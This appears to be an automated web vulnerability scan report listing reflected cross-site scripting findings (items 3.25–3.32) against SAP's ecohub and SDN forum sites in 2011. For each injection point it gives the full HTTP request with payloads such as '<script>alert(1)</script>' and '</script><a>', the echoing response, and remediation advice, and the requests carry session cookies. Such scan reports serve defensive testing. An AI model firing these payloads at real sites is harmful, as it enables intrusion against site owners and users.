User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css?1318315094
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 121
Cache-Control: public, max-age=86354
Expires: Sun, 16 Oct 2011 15:28:26 GMT
Date: Sat, 15 Oct 2011 15:29:12 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)</script>b80a639f6543df4c<script>alert(1)</script>54d7771a769/style.css
3.25. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39fa5<script>alert(1)</script>b22cba590c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css39fa5<script>alert(1)</script>b22cba590c?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css?1318315094
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 120
Date: Sat, 15 Oct 2011 15:29:13 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)</script>b80a639f654/style.css39fa5<script>alert(1)</script>b22cba590c
3.26. http://forums.sdn.sap.com/forum.jspa [forumID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The value of the forumID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fdeb</script><a>7cc8d3868a3 was submitted in the forumID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum.jspa?forumID=2099fdeb</script><a>7cc8d3868a3&start=0 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOEUwRjEtRjQxNjEwNzEyOTNDN0QyNw==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 9049
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: Not Fou
...[SNIP]...
"..."
   s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/forum.jspa?forumID=2099fdeb</script><a>7cc8d3868a3&start=0";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...
3.27. http://forums.sdn.sap.com/forum.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72910"><a>80712adb491 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /forum.jspa?forumID=209&start=0&72910"><a>80712adb491=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOTExOEUtODNFQTcyRDhDMjRBMjYzNg==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
Content-Length: 45770
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:23 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP Tec
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/style/style.jsp?72910"><a>80712adb491=1&amp;forumID=209&amp;start=0" />
...[SNIP]...
3.28. http://forums.sdn.sap.com/forum.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e249</script><a>03d13503ced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum.jspa?forumID=209&start=0&4e249</script><a>03d13503ced=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOTM0RDEtODZDQkRCQkM5RDA1OEVBNQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
Content-Length: 45834
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP Tec
...[SNIP]...
.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/forum.jspa?forumID=209&start=0&4e249</script><a>03d13503ced=1";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...
3.29. http://forums.sdn.sap.com/forum.jspa [start parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The value of the start request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da61d</script><a>3343eb56bb4 was submitted in the start parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum.jspa?forumID=209&start=0da61d</script><a>3343eb56bb4 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOEYwNjctMUI4NjBFNTdCRjdFMjFB
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9036
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:14 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: </title
...[SNIP]...
s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/forum.jspa?forumID=209&start=0da61d</script><a>3343eb56bb4";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...
3.30. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf476</script><a>2f82619d2da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=2059162&tstart=0&bf476</script><a>2f82619d2da=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690501070%3B%20pe%3Dno%2520value%7C1318690501073%3B%20c3%3Dno%2520value%7C1318690501076%3B%20s_nr%3D1318688701080-New%7C1321280701080%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292301082%3B%20s_visit%3D1%7C1318690501083%3B%20gpv_p47%3D1%7C1318690501086%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/thread.jspa%2525253FthreadID%2525253D2059162%25252526tstart%2525253D0%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOUU2RkMtNjhDNzA2NDFGQTJFMDE3NQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
SDN_THREAD: 2059162
SDN_MESSAGE: 10731664
Content-Length: 22343
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:26:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP SEC
...[SNIP]...
"glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=2059162&tstart=0&bf476</script><a>2f82619d2da=1";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...
3.31. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ddf"><a>ec5e2e237d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /thread.jspa?threadID=2059162&tstart=0&e4ddf"><a>ec5e2e237d2=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690501070%3B%20pe%3Dno%2520value%7C1318690501073%3B%20c3%3Dno%2520value%7C1318690501076%3B%20s_nr%3D1318688701080-New%7C1321280701080%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292301082%3B%20s_visit%3D1%7C1318690501083%3B%20gpv_p47%3D1%7C1318690501086%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/thread.jspa%2525253FthreadID%2525253D2059162%25252526tstart%2525253D0%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOUM0NDktRDcxQzM1NjVCMjlCQjYzNw==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
SDN_THREAD: 2059162
SDN_MESSAGE: 10731664
Content-Length: 22252
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:26:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP SEC
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/style/style.jsp?tstart=0&amp;threadID=2059162&amp;e4ddf"><a>ec5e2e237d2=1" />
...[SNIP]...
3.32. http://forums.sdn.sap.com/thread.jspa [threadID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6703c</script><a>08b4367be6b was submitted in the threadID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=20591626703c</script><a>08b4367be6b&tstart=0 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690501070%3B%20pe%3Dno%2520value%7C1318690501073%3B%20c3%3Dno%2520value%7C1318690501076%3B%20s_nr%3D1318688701080-New%7C1321280701080%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292301082%3B%20s_visit%3D1%7C1318690501083%3B%20gpv_p47%3D1%7C1318690501086%3B; 